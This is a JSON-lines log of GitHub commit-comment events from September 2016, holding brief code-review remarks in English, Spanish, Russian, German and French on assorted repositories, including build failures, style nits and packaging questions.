{"id":"4584811226","type":"CommitCommentEvent","actor":{"login":"jtigger"},"repo":{"name":"exercism/xjava"},"payload":{"comment":{"id":19082368,"position":null,"line":null,"path":null,"commit_id":"37721c40bf71dd71929a6a0a133c2263b45b0768","created_at":"2016-09-19T17:46:30Z","updated_at":"2016-09-19T17:46:30Z","body":"I wondered about that: what would be the most efficient way of signaling \"ready for deploy.\"\r\n\r\nHmmm... I'm smoking those pages and none of the intra-page links work.  Whatever we're using to render HTML from markdown is not generating anchors for headers. :(\r\n\r\nI'll investigate..."}},"created_at":"2016-09-19T17:46:30Z"}
{"id":"4584812795","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19082372,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-19T17:46:47Z","updated_at":"2016-09-19T17:46:47Z","body":"Хотим, блин, везде! Как это лекарство без производителя?"}},"created_at":"2016-09-19T17:46:47Z"}
{"id":"4584813853","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082377,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:46:59Z","updated_at":"2016-09-19T17:46:59Z","body":"Objetivo general\r\n![eeeee](https://cloud.githubusercontent.com/assets/21691880/18642664/2646410c-7e67-11e6-98db-5dac47176d43.JPG)\r\n"}},"created_at":"2016-09-19T17:46:59Z"}
{"id":"4584814918","type":"CommitCommentEvent","actor":{"login":"ehwat"},"repo":{"name":"DCC-org/documents"},"payload":{"comment":{"id":19082380,"position":null,"line":null,"path":null,"commit_id":"766532a08805151bb49a222b34b62f7b41568e72","created_at":"2016-09-19T17:47:10Z","updated_at":"2016-09-19T17:47:10Z","body":"diese ausrichtung, 10/10, würde"}},"created_at":"2016-09-19T17:47:10Z"}
{"id":"4584816942","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082384,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:47:29Z","updated_at":"2016-09-19T17:47:29Z","body":"Objetivos específicos\r\n![ttttttt](https://cloud.githubusercontent.com/assets/21691880/18642676/383b08f2-7e67-11e6-99e1-b633ad2ad82e.JPG)\r\n "}},"created_at":"2016-09-19T17:47:29Z"}
{"id":"4584820775","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082397,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:48:09Z","updated_at":"2016-09-19T17:48:09Z","body":"Planteamiento de pro\r\n![qwe](https://cloud.githubusercontent.com/assets/21691880/18642697/50c437e0-7e67-11e6-8fc8-8f9259feb1c8.JPG)\r\nblema"}},"created_at":"2016-09-19T17:48:09Z"}
{"id":"4584824027","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082405,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:48:42Z","updated_at":"2016-09-19T17:48:42Z","body":"Alcance del proyecto\r\n![uhi](https://cloud.githubusercontent.com/assets/21691880/18642719/64063fc4-7e67-11e6-9e16-11037a96e5ef.JPG)\r\n"}},"created_at":"2016-09-19T17:48:42Z"}
{"id":"4584825489","type":"CommitCommentEvent","actor":{"login":"cravay"},"repo":{"name":"motivationsbanner/client"},"payload":{"comment":{"id":19082411,"position":null,"line":null,"path":null,"commit_id":"d5ad9548d59dccbaaaa16d5be1bc12a7f2343e44","created_at":"2016-09-19T17:48:57Z","updated_at":"2016-09-19T17:48:57Z","body":"OMG! It doesn't compile anymore!! 😡 "}},"created_at":"2016-09-19T17:48:57Z"}
{"id":"4584827313","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082412,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:49:16Z","updated_at":"2016-09-19T17:49:16Z","body":"Justificación\r\n![ijj](https://cloud.githubusercontent.com/assets/21691880/18642737/78a5e696-7e67-11e6-8025-f1bae8079037.JPG)\r\n"}},"created_at":"2016-09-19T17:49:16Z"}
{"id":"4584830645","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082416,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:49:49Z","updated_at":"2016-09-19T17:49:49Z","body":"Técnicas de levantamiento de información\r\n![ghfgh](https://cloud.githubusercontent.com/assets/21691880/18642750/8b5dab48-7e67-11e6-809c-ef7df8b67fd9.JPG)\r\n "}},"created_at":"2016-09-19T17:49:49Z"}
{"id":"4584831090","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":19082417,"position":4,"line":87,"path":"rb/lib/selenium/webdriver/chrome/bridge.rb","commit_id":"134cbc257d9df7d02d7cbe7d5734434187927b26","created_at":"2016-09-19T17:49:53Z","updated_at":"2016-09-19T17:49:53Z","body":"I think you meant to replace the previous line here -- as it is this code won't do anything since the :proxy has already been deleted from ops."}},"created_at":"2016-09-19T17:49:53Z"}
{"id":"4584834588","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082421,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:50:30Z","updated_at":"2016-09-19T17:50:30Z","body":"Encuesta\r\n[Levantamiento de informacion.docx](https://github.com/Unifsena/Unifsena/files/480728/Levantamiento.de.informacion.docx)\r\n"}},"created_at":"2016-09-19T17:50:30Z"}
{"id":"4584834904","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":19082423,"position":null,"line":null,"path":null,"commit_id":"784909480833c44cf7c3910f4d9272b3adfb6e05","created_at":"2016-09-19T17:50:33Z","updated_at":"2016-09-19T17:50:33Z","body":"Thanks, merged just now."}},"created_at":"2016-09-19T17:50:33Z"}
{"id":"4584837543","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082426,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:50:59Z","updated_at":"2016-09-19T17:50:59Z","body":"[Tabulacion.docx](https://github.com/Unifsena/Unifsena/files/480730/Tabulacion.docx)\r\nTabulacion"}},"created_at":"2016-09-19T17:50:59Z"}
{"id":"4584839666","type":"CommitCommentEvent","actor":{"login":"elyase"},"repo":{"name":"salestock/fastText.py"},"payload":{"comment":{"id":19082429,"position":null,"line":null,"path":null,"commit_id":"fc1de74812f4cd726ee21d3775c5bd71c402eb9d","created_at":"2016-09-19T17:51:21Z","updated_at":"2016-09-19T17:51:21Z","body":"Unfortunately this loses the order of the vocabulary which might be important in some applications."}},"created_at":"2016-09-19T17:51:21Z"}
{"id":"4584839704","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082430,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:51:22Z","updated_at":"2016-09-19T17:51:22Z","body":"Entrevista\r\n\r\n"}},"created_at":"2016-09-19T17:51:22Z"}
{"id":"4584841565","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19082433,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T17:51:42Z","updated_at":"2016-09-19T17:51:42Z","body":"Issue is here: https://github.com/AOSP-JF-MM/platform_device_samsung_jflte/blob/aosp-7.0-test/releasetools/releasetools.py\r\n\r\nBlobs are not copied into system folder, i've checked rild size and it's the aosp version, not our blobs, so probably all others blobs are not copied... The workaround is to move gsm blobs in bin/lib/etc folders of vendor repo and modify the makefile, but doesn't work on locked bootloader devices, so i suppose even loki is broken too.. Probably the script must be updated.. I will take a look soon as i think i've fixed network issues here for mi5... Trying now and it's working fine after 10+ attempts...!"}},"created_at":"2016-09-19T17:51:42Z"}
{"id":"4584845200","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19082443,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T17:52:19Z","updated_at":"2016-09-19T17:52:19Z","body":"@khurshid-alam We should not be building packages off of `master`. I published a new official release specifically for the purpose of ensuring we had time to work out any packaging issues related to these changes. Can you make sure that out packages are pulling the latest release instead of `master` going forward? Also, could you explain more details regarding this...\r\n>We can not include changes file script inside makefile , Launchpad source can not hold git directory and so it can't process any git command."}},"created_at":"2016-09-19T17:52:19Z"}
{"id":"4584845220","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19082444,"position":null,"line":null,"path":null,"commit_id":"b724e2cd0087adca18edf2746078fd13a4f97f1e","created_at":"2016-09-19T17:52:19Z","updated_at":"2016-09-19T17:52:19Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2338 of 2338 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T17:52:19Z"}
{"id":"4584846718","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19082448,"position":108,"line":232,"path":"src/lib/lttng-ctl/load.c","commit_id":"eea79310817dadbc9fe5b68f9c69735b5e2fb860","created_at":"2016-09-19T17:52:35Z","updated_at":"2016-09-19T17:52:35Z","body":"Or we simply squash the path override..."}},"created_at":"2016-09-19T17:52:35Z"}
{"id":"4584852277","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19082460,"position":141,"line":265,"path":"src/lib/lttng-ctl/load.c","commit_id":"eea79310817dadbc9fe5b68f9c69735b5e2fb860","created_at":"2016-09-19T17:53:37Z","updated_at":"2016-09-19T17:53:37Z","body":"extra space"}},"created_at":"2016-09-19T17:53:37Z"}
{"id":"4584852905","type":"CommitCommentEvent","actor":{"login":"DPerezN"},"repo":{"name":"DPerezN/Inndex"},"payload":{"comment":{"id":19082463,"position":4,"line":17,"path":"web/index1.jsp","commit_id":"b00a9c5f8b4a1857e800fb30ab9f902ea0696560","created_at":"2016-09-19T17:53:44Z","updated_at":"2016-09-19T17:53:44Z","body":"que show con esta linea"}},"created_at":"2016-09-19T17:53:44Z"}
{"id":"4584853263","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19082465,"position":149,"line":273,"path":"src/lib/lttng-ctl/load.c","commit_id":"eea79310817dadbc9fe5b68f9c69735b5e2fb860","created_at":"2016-09-19T17:53:48Z","updated_at":"2016-09-19T17:53:48Z","body":"extra space"}},"created_at":"2016-09-19T17:53:48Z"}
{"id":"4584858917","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19082472,"position":343,"line":467,"path":"src/lib/lttng-ctl/load.c","commit_id":"eea79310817dadbc9fe5b68f9c69735b5e2fb860","created_at":"2016-09-19T17:54:46Z","updated_at":"2016-09-19T17:54:46Z","body":"extra space"}},"created_at":"2016-09-19T17:54:46Z"}
{"id":"4584860890","type":"CommitCommentEvent","actor":{"login":"EmilyK"},"repo":{"name":"shaunvadaketh/blogful"},"payload":{"comment":{"id":19082475,"position":null,"line":null,"path":null,"commit_id":"ca61a4b6ebc43bd4251472b72b4c85a95c77a221","created_at":"2016-09-19T17:55:08Z","updated_at":"2016-09-19T17:55:08Z","body":"@shaunvadaketh view the link below for some examples of `.gitignore` files. \r\nhttps://github.com/github/gitignore\r\n\r\n.pyc files should also be added to you `.gitignore` to have a cleaner commit"}},"created_at":"2016-09-19T17:55:08Z"}
{"id":"4584862238","type":"CommitCommentEvent","actor":{"login":"wdcunha"},"repo":{"name":"FDG-repository/FuturosDesenvolvedores"},"payload":{"comment":{"id":19082477,"position":null,"line":null,"path":null,"commit_id":"3e01971c9c1ef07600d6f95c05c266484373736a","created_at":"2016-09-19T17:55:21Z","updated_at":"2016-09-19T17:55:21Z","body":"Subir para gh-page para poder alterar a página em https://fdg-repository.github.io/FuturosDesenvolvedores/"}},"created_at":"2016-09-19T17:55:21Z"}
{"id":"4584863087","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19082478,"position":null,"line":null,"path":null,"commit_id":"040b8693720c1f7907fe910b65b71f06b8adf100","created_at":"2016-09-19T17:55:30Z","updated_at":"2016-09-19T17:55:30Z","body":"@khurshid-alam @satya164 Please see my comments [here](https://github.com/numixproject/numix-gtk-theme/commit/a8205bada6ea32e2d2224c896979927c66eaf899#commitcomment-19082443)."}},"created_at":"2016-09-19T17:55:30Z"}
{"id":"4584863185","type":"CommitCommentEvent","actor":{"login":"bookt-jacob"},"repo":{"name":"Bookt/WP-InstaSites"},"payload":{"comment":{"id":19082479,"position":null,"line":null,"path":null,"commit_id":"e3745691b7ba5286dff914190fe20143664e869e","created_at":"2016-09-19T17:55:31Z","updated_at":"2016-09-19T17:55:31Z","body":"I prefer we do this more like this using a proper hook:\r\n\r\n\r\nadd_action('bapi_loading_gif_hook', 'bapi_get_loading_gif');\r\n \r\nfunction bapi_get_loading_gif($img = plugins_url('img/loading.gif', __FILE__)) {\r\n\treturn $img;\r\n}\r\n\r\nfunction bapi_loading_gif_hook(){\r\n\tdo_action('bapi_loading_gif_hook');\r\n}"}},"created_at":"2016-09-19T17:55:31Z"}
{"id":"4584866697","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19082486,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-19T17:56:09Z","updated_at":"2016-09-19T17:56:09Z","body":"@LDVSOFT, так, я тебя не понимаю, ограничение же везде есть"}},"created_at":"2016-09-19T17:56:09Z"}
{"id":"4584870797","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":19082496,"position":22,"line":22,"path":"8/battery/style.css","commit_id":"3b84d5b81b33fee8b7c1303400bc92392c7060f6","created_at":"2016-09-19T17:56:52Z","updated_at":"2016-09-19T17:56:52Z","body":"ну почему absolute не сделать? так же проще"}},"created_at":"2016-09-19T17:56:52Z"}
{"id":"4584872118","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19082499,"position":null,"line":null,"path":null,"commit_id":"f3e58cf31d20513e412e1a01840f174d935be283","created_at":"2016-09-19T17:57:06Z","updated_at":"2016-09-19T17:57:06Z","body":"I will add"}},"created_at":"2016-09-19T17:57:06Z"}
{"id":"4584872336","type":"CommitCommentEvent","actor":{"login":"r2evans"},"repo":{"name":"imanuelcostigan/RSQLServer"},"payload":{"comment":{"id":19082500,"position":null,"line":null,"path":null,"commit_id":"976a24bd60a301e2f67ca7ff9ce833c9778d1538","created_at":"2016-09-19T17:57:09Z","updated_at":"2016-09-19T17:57:09Z","body":"Does this mean you want future PRs based on `master` instead of `feature-dbi-0_5`? I think I can adjust mine if necessary."}},"created_at":"2016-09-19T17:57:09Z"}
{"id":"4584874127","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19082506,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-19T17:57:27Z","updated_at":"2016-09-19T17:57:27Z","body":"@LDVSOFT, если ты про неравенства, то по идее, этого должно быть достаточно"}},"created_at":"2016-09-19T17:57:27Z"}
{"id":"4584876172","type":"CommitCommentEvent","actor":{"login":"shifwang"},"repo":{"name":"shifwang/SparseKmeans"},"payload":{"comment":{"id":19082512,"position":null,"line":null,"path":null,"commit_id":"5e1d0e223fb7dbb5f64915d3ed6779055c2e53bf","created_at":"2016-09-19T17:57:50Z","updated_at":"2016-09-19T17:57:50Z","body":"Because bio data is huge, I changed several parameters in algorithm to make them stop in a reasonable time."}},"created_at":"2016-09-19T17:57:50Z"}
{"id":"4584876701","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"Roboe/fprsdb"},"payload":{"comment":{"id":19082514,"position":null,"line":null,"path":null,"commit_id":"f5bc95963f9b006b62010a59d627b3aa7386c52d","created_at":"2016-09-19T17:57:56Z","updated_at":"2016-09-19T17:57:56Z","body":"Did I just push this to your fork? I thought this was not possible. Or are permissions inherited from the original repo?"}},"created_at":"2016-09-19T17:57:56Z"}
{"id":"4584879297","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082522,"position":13,"line":13,"path":"src/BenchmarkDotNet.Core/Columns/TargetMethodColumn.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:58:22Z","updated_at":"2016-09-19T17:58:22Z","body":"`calc` seems like a bad name to me, I expect it to calculate a value. Maybe valueProvider?"}},"created_at":"2016-09-19T17:58:22Z"}
{"id":"4584879652","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19082523,"position":null,"line":null,"path":null,"commit_id":"06a474de427a81c542163002efe6f7bcd228546c","created_at":"2016-09-19T17:58:25Z","updated_at":"2016-09-19T17:58:25Z","body":"very good, VERY! 👍 "}},"created_at":"2016-09-19T17:58:25Z"}
{"id":"4584882537","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19082537,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T17:58:57Z","updated_at":"2016-09-19T17:58:57Z","body":"Unfortunately launchpad import function doesn't allow anything other than master branch. We need to upload it manually. I will check if there is any other way."}},"created_at":"2016-09-19T17:58:57Z"}
{"id":"4584883415","type":"CommitCommentEvent","actor":{"login":"hustle74"},"repo":{"name":"hustle74/gdnt"},"payload":{"comment":{"id":19082541,"position":null,"line":null,"path":null,"commit_id":"73494d8c3efcfe9681e61d9d7462c2bdcb9579c4","created_at":"2016-09-19T17:59:08Z","updated_at":"2016-09-19T17:59:08Z","body":"#"}},"created_at":"2016-09-19T17:59:08Z"}
{"id":"4584887279","type":"CommitCommentEvent","actor":{"login":"yoavg"},"repo":{"name":"clab/cnn"},"payload":{"comment":{"id":19082544,"position":null,"line":null,"path":null,"commit_id":"99142ae9619a2abd60397cc7049465e05d9ca62c","created_at":"2016-09-19T17:59:49Z","updated_at":"2016-09-19T17:59:49Z","body":"On mobile now, will commit when at computer again. Thanks!"}},"created_at":"2016-09-19T17:59:49Z"}
{"id":"4584890467","type":"CommitCommentEvent","actor":{"login":"hustle74"},"repo":{"name":"hustle74/gdnt"},"payload":{"comment":{"id":19082553,"position":null,"line":null,"path":null,"commit_id":"73494d8c3efcfe9681e61d9d7462c2bdcb9579c4","created_at":"2016-09-19T18:00:23Z","updated_at":"2016-09-19T18:00:23Z","body":"\r\n\r\n# #"}},"created_at":"2016-09-19T18:00:23Z"}
{"id":"4584893314","type":"CommitCommentEvent","actor":{"login":"ellson"},"repo":{"name":"ellson/graphviz"},"payload":{"comment":{"id":19082562,"position":null,"line":null,"path":null,"commit_id":"bd8475224854e99eb8876b33b5ce290f74441a99","created_at":"2016-09-19T18:00:48Z","updated_at":"2016-09-19T18:00:48Z","body":"I get this failure from (at least) fedora21, 22, 23, 24 when linking libann without -lstdc++ \n\nlibann is from the Fedora distribution: \n\nbld-fedora23:mingle$ make \nCCLD mingle \n/usr/bin/ld: ../../lib/mingle/.libs/libmingle_C.a(nearest_neighbor_graph_ann.o): undefined reference to symbol '_ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4' \n/usr/lib64/libstdc++.so.6: error adding symbols: DSO missing from command line \ncollect2: error: ld returned 1 exit status \nMakefile:684: recipe for target 'mingle' failed \nmake: *** [mingle] Error 1 \n\n\nIs this a bug that needs reporting against libann? \n\nJohn \n\n\n\n----- Original Message -----\n\nFrom: \"Erwin Janssen\" <notifications@github.com> \nTo: \"ellson/graphviz\" <graphviz@noreply.github.com> \nCc: \"John Ellson\" <john.ellson@comcast.net>, \"Author\" <author@noreply.github.com> \nSent: Friday, September 16, 2016 11:39:31 AM \nSubject: Re: [ellson/graphviz] Re-added -lstdc++ to fix build breakage (bd84752) \n\n\n\nWhat configuration / machine are you using where this caused a build breakage? This should be added Travis if possible. \n\n— \nYou are receiving this because you authored the thread. \nReply to this email directly, view it on GitHub , or mute the thread . \n\n\n"}},"created_at":"2016-09-19T18:00:48Z"}
{"id":"4584899969","type":"CommitCommentEvent","actor":{"login":"JSlote"},"repo":{"name":"CarletonDevX/web-print"},"payload":{"comment":{"id":19082574,"position":null,"line":null,"path":null,"commit_id":"70030fae2915613bc2c978a11d7e650edbfabe71","created_at":"2016-09-19T18:01:55Z","updated_at":"2016-09-19T18:01:55Z","body":"![image](https://cloud.githubusercontent.com/assets/2043489/18643115/9debd622-7e71-11e6-8940-8dd1ee12e722.png)\r\n"}},"created_at":"2016-09-19T18:01:55Z"}
{"id":"4584902316","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19082580,"position":null,"line":null,"path":null,"commit_id":"a20d8e0d6eac4e258911fbc2622d3b0c7dbac78e","created_at":"2016-09-19T18:02:20Z","updated_at":"2016-09-19T18:02:20Z","body":"It would be nice to also detail the workaround for code that checked up to Agda-2.5.1.1 and is affected by this change."}},"created_at":"2016-09-19T18:02:20Z"}
{"id":"4584903019","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19082584,"position":null,"line":null,"path":null,"commit_id":"3130eb85258c6626113e464edc50d7d9aaee54fa","created_at":"2016-09-19T18:02:28Z","updated_at":"2016-09-19T18:02:28Z","body":"I don't fully agree.\r\nI know that this flag might not be handled correctly, but it's being used in a lot of scripts and \"it works\".\r\nRemoving it, will break a lot of things, so we need to put it back, one way or another."}},"created_at":"2016-09-19T18:02:28Z"}
{"id":"4584903570","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082586,"position":7,"line":7,"path":"ex10.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:02:34Z","updated_at":"2016-09-19T18:02:34Z","body":"оригинальное решение)\r\nно можно решить и без стека, причем не используя дополнительной памяти и в один проход строки"}},"created_at":"2016-09-19T18:02:34Z"}
{"id":"4584904282","type":"CommitCommentEvent","actor":{"login":"Etanoke"},"repo":{"name":"Etanoke/debian_setup"},"payload":{"comment":{"id":19082587,"position":5,"line":4,"path":"pytnon3_install.sh","commit_id":"ca0b9f8df7d0335f3b16f2c706e5860a57dddf6a","created_at":"2016-09-19T18:02:41Z","updated_at":"2016-09-19T18:02:41Z","body":"3meth → 3th"}},"created_at":"2016-09-19T18:02:41Z"}
{"id":"4584906825","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082594,"position":10,"line":10,"path":"src/BenchmarkDotNet.Core/Engines/Consumer.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:03:03Z","updated_at":"2016-09-19T18:03:03Z","body":"should this be implemented before Release?"}},"created_at":"2016-09-19T18:03:03Z"}
{"id":"4584908115","type":"CommitCommentEvent","actor":{"login":"Etanoke"},"repo":{"name":"Etanoke/debian_setup"},"payload":{"comment":{"id":19082598,"position":36,"line":23,"path":"pytnon3_install.sh","commit_id":"ca0b9f8df7d0335f3b16f2c706e5860a57dddf6a","created_at":"2016-09-19T18:03:14Z","updated_at":"2016-09-19T18:03:14Z","body":"$ sudo $SCRIPT_NAME -3"}},"created_at":"2016-09-19T18:03:14Z"}
{"id":"4584910797","type":"CommitCommentEvent","actor":{"login":"osstony"},"repo":{"name":"20tab/UnrealEnginePython"},"payload":{"comment":{"id":19082602,"position":23,"line":502,"path":"Source/UnrealEnginePython/Private/UEPyEngine.cpp","commit_id":"f94fada520a98320eefbe59be24f5367ec81888c","created_at":"2016-09-19T18:03:33Z","updated_at":"2016-09-19T18:03:33Z","body":"@rdeioris how does UPythonDelegate::ProcessEvent end up getting called?"}},"created_at":"2016-09-19T18:03:33Z"}
{"id":"4584914004","type":"CommitCommentEvent","actor":{"login":"xantares"},"repo":{"name":"CGAL/cgal-swig-bindings"},"payload":{"comment":{"id":19082607,"position":null,"line":null,"path":null,"commit_id":"91d2c5e139d0d96217b21f9123b7a60e01164e84","created_at":"2016-09-19T18:04:05Z","updated_at":"2016-09-19T18:04:05Z","body":"@sloriot build fails for 4.9: https://travis-ci.org/CGAL/cgal-swig-bindings/builds/161101254, is this related ?\r\n"}},"created_at":"2016-09-19T18:04:05Z"}
{"id":"4584918405","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":19082615,"position":null,"line":null,"path":null,"commit_id":"191784433813dd098879f8218cb9a804f77d545e","created_at":"2016-09-19T18:04:50Z","updated_at":"2016-09-19T18:04:50Z","body":"Each change in upstream needs a discussion. Sure it makes sense to have all files checked with kwalify. However it is minor as it worked with the old style also. Lets see what @teo thinks about it ..."}},"created_at":"2016-09-19T18:04:50Z"}
{"id":"4584919052","type":"CommitCommentEvent","actor":{"login":"Aurore77"},"repo":{"name":"Aurore77/git_workflow"},"payload":{"comment":{"id":19082616,"position":null,"line":null,"path":null,"commit_id":"33a3a503a56e922014ccd0b49c8dd4b790d7aae1","created_at":"2016-09-19T18:04:56Z","updated_at":"2016-09-19T18:04:56Z","body":"Voici le commit initial pour git_workflow\r\n"}},"created_at":"2016-09-19T18:04:56Z"}
{"id":"4584922849","type":"CommitCommentEvent","actor":{"login":"MSGhero"},"repo":{"name":"HaxeFlixel/flixel"},"payload":{"comment":{"id":19082623,"position":25,"line":131,"path":"flixel/system/debug/watch/EditableTextField.hx","commit_id":"5702c9264ea274df8716b3ace5cc5df85191de78","created_at":"2016-09-19T18:05:38Z","updated_at":"2016-09-19T18:05:38Z","body":"`else if (index < 0) index = values.length - 1;`?"}},"created_at":"2016-09-19T18:05:38Z"}
{"id":"4584928635","type":"CommitCommentEvent","actor":{"login":"LightProg"},"repo":{"name":"LightProg/Test"},"payload":{"comment":{"id":19082636,"position":4,"line":5,"path":"README.md","commit_id":"79ba5e5613169ed9249231ac2a80181022fe96fc","created_at":"2016-09-19T18:06:38Z","updated_at":"2016-09-19T18:06:38Z","body":"why???"}},"created_at":"2016-09-19T18:06:38Z"}
{"id":"4584929734","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082637,"position":45,"line":45,"path":"ex2.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:06:49Z","updated_at":"2016-09-19T18:06:49Z","body":"не сломает ли это присваивание корректность при выполнении условия ниже?"}},"created_at":"2016-09-19T18:06:49Z"}
{"id":"4584930078","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"allevas/ITStep_Lesson_4"},"payload":{"comment":{"id":19082638,"position":30,"line":30,"path":"ex2.cpp","commit_id":"6ece3f06c81354118eb34256d1c3ddc02c1be0e7","created_at":"2016-09-19T18:06:53Z","updated_at":"2016-09-19T18:06:53Z","body":"не сломает ли это присваивание корректность при выполнении условия ниже?"}},"created_at":"2016-09-19T18:06:53Z"}
